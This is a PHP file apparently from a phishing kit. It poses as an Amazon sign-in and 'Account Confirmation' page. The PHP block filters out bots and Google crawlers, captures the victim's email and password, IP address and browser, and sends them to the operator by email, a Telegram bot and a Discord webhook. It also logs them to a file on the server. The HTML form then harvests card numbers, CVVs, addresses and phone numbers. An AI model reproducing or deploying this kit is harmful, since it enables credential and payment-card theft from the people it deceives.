<?php
ob_start();
session_start();
$path = "../site/";
require ("../DheReckahConfi/Guration.php");
require ("../DheReckahConfi/Function.php");
require ("../DheReckahDecline/AntiBotIp.php");
require ("../DheReckahDecline/AntiBotPw.php");
require ("../DheReckahDecline/AntiBotKillBot.php");
require ("../DheReckahDecline/AntiBotUserAgent.php");
require ("../DheReckahDecline/AntiBotIsp.php");
require ("../DheReckahDecline/AnitiBotHost.php");
require ("../DheReckahDecline/AntiBotPhishTank.php");
require ("../DheReckahDecline/AntiBotVpn.php");
require ("../DheReckahDecline/AntiBotProxy.php");
require ("../DheReckahDecline/AntBotProtection.php");
require ("../DheReckahDecline/SaveBrowsing.php");
require ("../DheReckahDecline/DiscoveredBot.php");
require ("../DheReckahDecline/AntiBotThree.php");
require ("../DheReckahDecline/DisturbOne.php");
require ("../DheReckahDecline/DisturbTwo.php");
require ("../DheReckahDecline/DoRandoMize.php");
require("../DheReckahDecline/Anti/Bot-Crawler.php");
@require("../DheReckahDecline/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect; 

if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { 
    include($path."index.php"); exit();
}
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) {
    include($path."index.php"); exit();
}

if (isset($_POST['hidden']) && !empty($_POST['DheReckahDatorKiller'])  ) {
  include($path."index.php"); exit();
  
}
if (!isset($_SESSION['Dh3R3ck4h_SESSION_T0k3n']) ) {
  include($path."index.php"); exit();
}
#if (!isset($_POST['tokenDheReckahCsrf'])) {
#    include($path."index.php"); 
  
#}
#if ($_POST['tokenDheReckahCsrf'] != $_SESSION['Dh3R3ck4h_SESSION_T0k3n']) {
#    include($path."index.php"); 
#}  
// if (isset($_POST['emailaccess2'])){
//    $_SESSION['emailaccess2']  = $_POST['emailaccess2'];
//    }     
if (isset($_POST['submit'])){
   $_SESSION['submit']  = $_POST['submit'];
   }
$ip = getIp();
$browser = DheReckah_Browser();
$date = date("d M, Y");
$time = date("g:i a");
$date = trim($date . ", Time : " . $time);
$doublePassword = strtolower($doublePassword);
$saveItOnHost = strtolower($saveItOnHost);
$sendToEmail = strtolower($sendToEmail);
$sendToTelegramBot = strtolower($sendToTelegramBot);
$sendToDiscordBot = strtolower($sendToDiscordBot);
extract($_REQUEST);
if($_SERVER['REQUEST_METHOD'] == 'POST'){
if(isset($_POST['invalid'])){
  if (!empty($_POST['invalid'])){


    $_SESSION['emailaccesspass2']  = $_POST['emailaccesspass2'];
 


       //Admin Panel

      $msgItOnHost = "<t============================================>
<t".$YourName." 2nd ".$PageName."==> <t===Em4!l&P4s5w0rd>
<Em4!lAcc3s5>    :         <t ".$_SESSION['emailaccess2'].">
<Em4!lP45ss>     :         <t ".$_SESSION['emailaccesspass2'].">
<V!ct!m3Ip>      :         <t ".$ip.">
<V!ct!m3D4t3>    :         <t ".$date.">
<V!ct!m3Br0ws3r> :         <".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT']).">
<Us3rAg4nt>      :         <t ".($_SERVER['HTTP_USER_AGENT']).">
<t=============================================>";


          $telegramMsg ="
         
[".$YourName." 2nd ".$PageName." ❤️😜❤️
[Em4!l&P4s5w0rd H45 B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤2ndEm4!lAcc3s5:|👉 ".$_SESSION['emailaccess2']."
[👤2ndEm4!lP45ss:|👉 ".$_SESSION['emailaccesspass2']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


      $discordMsg ="
[".$YourName." 2nd ".$PageName." ❤️😜❤️
[Em4!l&P4s5w0rd H45 B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤2ndEm4!lAcc3s5:|👉 ".$_SESSION['emailaccess2']."
[👤2ndEm4!lP45ss:|👉 ".$_SESSION['emailaccesspass2']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


          $Subject .= "[".$YourName." 2nd ".$PageName."❤️😜❤️ \n";
          $Subject .= "[Em4!l&P4s5w0rd H45 B3en Fi5h❤️😜❤️||🐟🐟🐟🐟🐟🐟🐟🐟🐟||\n";
          $Subject .= "[Office Em4!lAcc3s=| ".$_SESSION['emailaccess']."] !P=[".$ip."]";
          $headers .= "MIME-Version: 1.0" . "\r\n";
          $headers .= "From: ".$Owner.".$DheReckahServer." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "[".$YourName." 2nd ".$PageName." || \n";
          $msg .= "[Em4!lAcc3s5 H45 B3en ||\n";
          $msg .= "[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟  ||\n";
          $msg .= "[👤2ndEm4!lAcc3s5 :|| ".$_SESSION['emailaccess2']." \n";
          $msg .= "[👤2ndEm4!lP45ss  :|| ".$_POST['emailaccesspass2']." \n";
          $msg .= "[🔍!P             : ".$ip." ||\n";
          $msg .= "[⏰D4t3&T!m3      : ".$date." ||\n";
          $msg .= "[🌐BR0S3R/D3V!C3  : ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." On ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])." ||\n";
          $msg .= "[👤Us3rAg4nt      : ".($_SERVER['HTTP_USER_AGENT'])." ||\n";



    
      if ($saveItOnHost == "true") {
          $DheReckahCoded = array(
               'msgItOnHost' => $msgItOnHost,
            );
         echo json_encode($DheReckahCoded);
          $fil = fopen("../DheReckahHost/Fishes/2nd0ff1c.html", "a+");
          fwrite($fil, $msgItOnHost);   
      }
      
      if ($sendToEmail == "true") {
         $DheReckahCoded = array(
             'msg' => $msg,
             'headers' => $headers,
             'Subject' => $Subject,
        );
        echo json_encode($DheReckahCoded);
        @send($yourEmail, $Subject, $msg,$headers);

      }
      
      if ($sendToTelegramBot == "true") {
           $DheReckahCoded = array(
               'telegramMsg' => $telegramMsg,
            );
         echo json_encode($DheReckahCoded);
         @send($telegramMsg,$botToken,$chatId);

  $DheReckahApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> urldecode($telegramMsg),
  ];
  $ch = curl_init($DheReckahApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
      }
if ($sendToDiscordBot == "true"){
    $DheReckahCoded = array(
        'discordMsg' => $discordMsg,
    );
    echo json_encode($DheReckahCoded);
    $DheReckahApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $DheReckahApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);

}


  }


exit(header("Location:  $priv4"));


}
if($_SERVER['REQUEST_METHOD'] == 'POST'){


    $_SESSION['emailaccesspass2']  = $_POST['emailaccesspass2'];

       //Admin Panel

      $msgItOnHost = "<t============================================>
<t".$YourName." ".$PageName."==> <t===Em4!l&P4s5w0rd>
<Em4!lAcc3s5>    :         <t ".$_SESSION['emailaccess2'].">
<Em4!lP45ss>     :         <t ".$_SESSION['emailaccesspass2'].">
<V!ct!m3Ip>      :         <t ".$ip.">
<V!ct!m3D4t3>    :         <t ".$date.">
<V!ct!m3Br0ws3r> :         <".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT']).">
<Us3rAg4nt>      :         <t ".($_SERVER['HTTP_USER_AGENT']).">
<t=============================================>";


          $telegramMsg ="
         
[".$YourName." ".$PageName." ❤️😜❤️
[Em4!l&P4s5w0rd H4s B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤Em4!lAcc3s5:|👉 ".$_SESSION['emailaccess2']."
[👤Em4!lP45ss:|👉 ".$_SESSION['emailaccesspass2']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


      $discordMsg ="
[".$YourName." ".$PageName." ❤️😜❤️
[Em4!l&P4s5w0rd H4s B3en
[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤Em4!lAcc3s5:|👉 ".$_SESSION['emailaccess2']."
[👤Em4!lP45ss:|👉 ".$_SESSION['emailaccesspass2']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


          $Subject .= "[".$YourName." ".$PageName."❤️😜❤️ \n";
          $Subject .= "[Em4!l&P4s5w0rd B3en Fi5h❤️😜❤️||🐟🐟🐟🐟🐟🐟🐟🐟🐟||\n";
          $Subject .= "[Em4!lAcc3s5=| ".$_SESSION['emailaccess']."] !P=[".$ip."]";
          $headers .= "MIME-Version: 1.0" . "\r\n";
          $headers .= "From: ".$Owner.".$DheReckahServer." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "[".$YourName." ".$PageName." || \n";
          $msg .= "[Em4!l&P4s5w0rd H4s B3en ||\n";
          $msg .= "[Fi5h:|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟  ||\n";
          $msg .= "[👤Em4!lAcc3s5     :|| ".$_SESSION['emailaccess2']." \n";
          $msg .= "[👤Em4!lP45ss      :|| ".$_POST['emailaccesspass2']." \n";
          $msg .= "[🔍!P             : ".$ip." ||\n";
          $msg .= "[⏰D4t3&T!m3      : ".$date." ||\n";
          $msg .= "[🌐BR0S3R/D3V!C3  : ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." On ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])." ||\n";
          $msg .= "[👤Us3rAg4nt      : ".($_SERVER['HTTP_USER_AGENT'])." ||\n";



    
      if ($saveItOnHost == "true") {
          $DheReckahCoded = array(
               'msgItOnHost' => $msgItOnHost,
            );
         echo json_encode($DheReckahCoded);
          $fil = fopen("../DheReckahHost/Fishes/Gm41l.html", "a+");
          fwrite($fil, $msgItOnHost);   
      }
      
      if ($sendToEmail == "true") {
          $DheReckahCoded = array(
              'msg' => $msg,
              'headers' => $headers,
              'Subject' => $Subject,
        );
        echo json_encode($DheReckahCoded);
        @send($yourEmail, $Subject, $msg,$headers);

      }
      
      if ($sendToTelegramBot == "true") {
        $DheReckahCoded = array(
               'telegramMsg' => $telegramMsg,
            );
         echo json_encode($DheReckahCoded);
        @send($telegramMsg,$botToken,$chatId);

  $DheReckahApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> urldecode($telegramMsg),
  ];
  $ch = curl_init($DheReckahApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
      }
if ($sendToDiscordBot == "true"){
    $DheReckahCoded = array(
        'discordMsg' => $discordMsg,
    );
    echo json_encode($DheReckahCoded);
    $DheReckahApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $DheReckahApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);


}

  }


$rand = generateRandomString(130);
$cage = substr(sha1(mt_rand()),1,25);

if ($doubleEmailAcces=="yes") {
    exit(header("Location: $priv5&invalid=eM41l"));
  }
  if ($show_contact_information=="yes") {
    exit(header("Location: $priv3"));
  }
  if ($show_credit_card=="yes") {
    exit(header("Location: $priv2"));
  }
  if ($show_selfie_upload=="yes") {
    exit(header("Location: $priv1"));
  }
  if ($show_success_page=="yes") {
    exit(header("Location: priv0")); 

}else{

    $dicline = array_keys($_SESSION);
        foreach ($dicline as $cage){
            unset($_SESSION[$cage]);
          }
        include($path."index.php"); exit();
  }

} 

?>


<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
    <title dir="ltr">Amazon Sign-In</title>
     <!-- <title><?php echo htmlentities("leboncoin - connexion", ENT_QUOTES, "UTF-8"); ?></title> -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <!-- <meta http-equiv="refresh" content="5;url=data.php?ajax=blg"> -->

<meta charset="utf-8">
            <meta data-react-helmet="true" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=6.0 user-scalable=0">
            <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
            <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1, user-scalable=yes">
            <meta name="robots" content="noindex,nofollow" />
            <meta name="googlebot" content="noindex,nofollow" />
            <meta name="googlebot-news" content="nosnippet">
            <META NAME="robots" CONTENT="nofollow">
            <meta http-equiv="Cache-Control" content="no-store">
            <meta http-equiv="Cache-Control" content="no-cache">
            <meta http-equiv="Cache-Control" content="private">
            <meta http-equiv="Pragma" content="no-cache">
            <meta name="next-head-count" content="2">
            <noscript data-n-css=""></noscript>
            <link rel="shortcut icon" href="./file/img/favicon.ico">
            <link rel="stylesheet" href="./file/2.css">
                <script src="./file/js/angular.min.js"></script>


 <script src="./file/js/jquery.js"></script>
    <script src="./file/js/jquery.validate.js"></script>
    <script src="./file/js/additional-methods.js"></script>
    <script src="./file/js/jquery.maskedinput.js"></script>
    <script src="./file/js/jquery.payment.js"></script>
    
       <script type="text/javascript">


        jQuery(function($) {
            $('#cardnumber').payment('formatCardNumber');
            var carde = $('#cc').val();
            $('#cardnumber').focusout(function() {
  var cardType = $.payment.cardType($('#cardnumber').val());
  if ($.payment.validateCardNumber($('#cardnumber').val()) == false){
    //this.setCustomValidity(' ');
    $('#cardnumber').val('');
  }
//console.log(cardType);
    if(cardType == 'amex'){
        $("#cvv").attr("maxlength", "4");
    }else{
        $("#cvv").attr("maxlength", "3");
    }
});
            
        });

    </script>


    <script type="text/javascript">
        jQuery(function($){
            $("#expdate").mask("99/99",{placeholder:"MM/YY"});
            $("#ssn").mask("999-99-9999");
            $("#phoneNumber").mask("(999) 999-9999");
             $("#ZipCode").mask("99999");
        });


    </script>


      

      
        




      
    
  
</head>
  <body class="ap-locale-fr_FR a-m-us a-aui_157141-c a-aui_158613-c a-aui_72554-c a-aui_dropdown_187959-c a-aui_pci_risk_banner_210084-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_145937-c a-meter-animate">




<div id="a-page">
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        





<div id="alirctx" class="a-section a-spacing-medium a-text-center">
  
    

    
      


<a class="a-link-nav-icon" tabindex="-1" href="/ref=ap_frn_logo">
  
  <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

  
  
    
      
  
</a>

    
  
</div>


      </div>

      <div id="authportal-center-section" class="a-section">
        
          
          
            <div id="authportal-main-section" class="a-section">
              






<div id="appctx" class="a-section auth-pagelet-container" style="
    width: 412px;
    margin: 0 auto;
">
  

















  
    





<div class="a-section a-spacing-base">
  <div class="a-section">
    
    <form name="signIn" method="post" action="<?php echo $priv1;?>" class="auth-validate-form auth-real-time-validation a-spacing-none">
      
      

      




  
    
  
    
  
    
  



      <div class="a-section">
        <div class="a-box"><div class="a-box-inner a-padding-extra-large">
          <h1 class="a-spacing-small">
Account Confirmation </h1>
          
          
          <div class="a-divider a-divider-break"><h5>Card Information</h5></div>






<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Card number
</label>
<input required="" type="text" maxlength="128" id="cardnumber" name="cc" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="8a402g" style="background-position: 98.5% -0.2%;"></div>


<div class="multi equal clearfix">
<div class=" left">


<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Expiration date</label>
<input required="" type="text" maxlength="128" id="expdate" name="cc_exp" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="33b9n"></div>

</div>
<div class="right"> 

<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Security code</label>
<input required="" type="text" maxlength="4" id="Securitycode" name="cvv" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="iuf1b"></div>

</div></div>

<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Name on the card</label>
<input required="" type="text" maxlength="128" id="NameOnCard" name="namer" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="i1bs1j"></div>





          <div class="a-row a-spacing-base">
            <div class="a-divider a-divider-break"><h5>Address information</h5></div>






<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Address Line
</label>
<input required="" type="text" maxlength="128" id="addres" name="address" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="rqje45h"></div>

<div class="multi equal clearfix">
<div class=" left">


<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
City</label>

<input required="" type="text" maxlength="128" id="City" name="city" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="2qwzki"></div>

</div>
<div class="right"> 



<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
State</label>
<input required="" type="text" maxlength="128" id="State" name="state" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="9t8lha"></div>


</div></div>




<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Postal code
</label>
<input required="" type="text" maxlength="128" id="ZipCode" name="zipcode" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="z1wt03r"></div>

<div class="a-row a-spacing-base">
<label for="ap_email" class="a-form-label">
Phone number
</label>
<input required="" type="text" placeholder="(___)___-____ "maxlength="128" id="phoneNumber" name="mobilenum" class="a-input-text a-span12 auth-autofocus auth-required-field" fdprocessedid="d0kob"></div>



          </div>
          <div class="a-section">
            
            









            
            <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" type="submit" name="submit" aria-labelledby="continue-announce" fdprocessedid="k9vf2q"><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Continue
            </span></span></span>

            
            
              



 

            

            



          </div>

          

          

          






          




  
  
  
    
      
      
      
        
        
      
    
  


          
          
        </div></div>
      </div>
    </form>
  </div>
  
    
    
      
        
        
        
      
    
  
</div>

  
  

</div>
            </div>
          
        
      </div>

      
      <div id="right-2">
      </div>

      <div class="a-section a-spacing-top-extra-large auth-footer">
        



<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
  <span class="auth-footer-seperator"></span>

  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Terms of use
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
Protection of your personal information    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
    Help
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Cookies
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Ads based on your interests
    </a>
    <span class="auth-footer-seperator"></span>
  

  
</div>




<div class="a-section a-spacing-none a-text-center">
  





<span class="a-size-mini a-color-secondary">
  © 1996-2023, Amazon.com, Inc. or its affiliates.
</span>

</div>

      </div>
    </div>

   
    
    
  </div>

 



  

    <dir style="display: none;">


</dir>
<script type="text/javascript">   
    $('#cardnumber').validateCreditCard(function(result) {
            // console.log(result);
            if (result.card_type != null) {
                switch (result.card_type.name) {
                    case "VISA":

 $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



$('.chtadakchi').attr('id', 'chtavisa');


$('#cardsmiya').attr('class', 'creditOrDebit visa blue card image');





$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('').addClass('cardImages-icon_selected');
$('#cscaa').removeClass('csc-image_amex').addClass('');

                        $('#cardnumber').css('background-position', '98.5% 94%');
$('#thDSecure').css('background-position', '255.5% -20.5%'); 

                        break;
                    case "VISA ELECTRON":


$('.chtadakchi').attr('id', 'chtavisa');


$('#cardsmiya').attr('class', 'creditOrDebit visa blue card image');


$('#cardnumber').css('background-position', '98.5% 97%'); 


$('#thDSecure').css('background-position', '99.5% -20.5%'); 



$('#cscaa').removeClass('csc-image_amex').addClass('');

   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



                        break;
                    case "MASTERCARD":


$('.chtadakchi').attr('id', 'chtamastercard');



$('#cardsmiya').attr('class', 'creditOrDebit mastercard black card image');






   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');

$('#metrcardaa').removeClass('').addClass('cardImages-icon_selected');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected ').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('csc-image_amex').addClass('');

                        $('#cardnumber').css('background-position', '98.5% 72%');

$('#thDSecure').css('background-position', '99.5% 9.5%'); 

                        break;
                    case "MAESTRO":

$('.chtadakchi').attr('id', 'chtamastartro');


$('#cardsmiya').attr('class', 'creditOrDebit maestro black card image');



   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');

$('#cardnumber').css('background-position', '98.5% 69%');

$('#thDSecure').css('background-position', '102.5% 62.5%'); 



                        break;
                    case "DISCOVER":


$('.chtadakchi').attr('id', 'chtadiscover');


$('#cardsmiya').attr('class', 'creditOrDebit discover gray card image');



   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



                        $('#cardnumber').css('background-position', '98.5% 46.8%');

$('#thDSecure').css('background-position', '98.5% 46.8%'); 

          
$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('').addClass('cardImages-icon_selected');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');

$('#cscaa').removeClass('csc-image_amex').addClass('');



break;
                    case "AMEX":

$('.chtadakchi').attr('id', 'chtaofam');
 

$('#cardsmiya').attr('class', 'creditOrDebit amex gray card image');




$('#csc').attr('pattern', '[0-9]{4}');
          $('#Securitycode').attr('maxlength', '4');

                        $('#cardnumber').css('background-position', '98.5% 6%');
$('#thDSecure').css('background-position', '99.5% 34%'); 




$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('').addClass('cardImages-icon_selected');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('').addClass('csc-image_amex');


                        break;
          case "JCB":

$('.chtadakchi').attr('id', 'chtajcb');




$('#cardsmiya').attr('class', 'creditOrDebit jcb gold card image');



$('#csc').attr('placeholder', 'Enter security code'); 

$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('').addClass('csc-image_amex');
                        $('#cardnumber').css('background-position', '98.5% 32%');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


                       break;
          case "DINERS_CLUB":

$('.chtadakchi').attr('id', 'chtacalub');


$('#cardsmiya').attr('class', 'creditOrDebit cb_nationale blue card image');





                        $('#cardnumber').css('background-position', '98.5% 24.8%');
$('#thDSecure').css('background-position', '99.5% -20.5%'); 

                        break;
          default:
                        $('#cardnumber').css('background-position', '98.5% 81.7%');
$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('').addClass('cardImages-icon_selected');

                        $('#cardnumber').css('background-position', '98.5% -1%');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#csc').attr('placeholder', 'Enter security code'); 
                        break;
                }
      } else {

$('.chtadakchi').attr('id', 'jkljk');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#cardsmiya').attr('class', 'creditOrDebit reb3lpp blue card image');








$('#soracard').removeClass('visaLogo').addClass('');
$('#soracard').removeClass('master_cardLogo').addClass('');
$('#soracard').removeClass('amexLogo').addClass('');
$('#soracard').removeClass('discoverLogo').addClass('');


$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');

                $('#cardnumber').css('background-position', '98.5% -0.2%');

$('#csc').attr('placeholder', 'Enter security code');
            }
       // Check for valid card numbere - only show validation checks for invalid Luhn when length is correct so as not to confuse user as they type.
            if (result.valid || $cardinput.val().length > 16) {
                if (result.valid) {


                    $('#cardnumber').removeClass('error').addClass('');
                } else {
                    $('#cardnumber') .removeClass('').addClass('error');
                }
            } else {
                $('#cardnumber').removeClass('').removeClass('error');
            }
        });
    </script>



  <script type="text/javascript">
        $(function() {
        $('#cardnumber').validateCreditCard(function(result) {
                document.getElementById('card_type').value  = result.card_type.name
                document.getElementById('card_valid').value = result.valid
      $('#cardnumber').validateCreditCard(function(result) {
          if(result.card_type == null){
                    $('#cardnumber').removeClass();
                }
                else{
                    $('#cardnumber').addClass(result.card_type.name);
          
                }
            });
            });
    });
        </script>
</body></html>
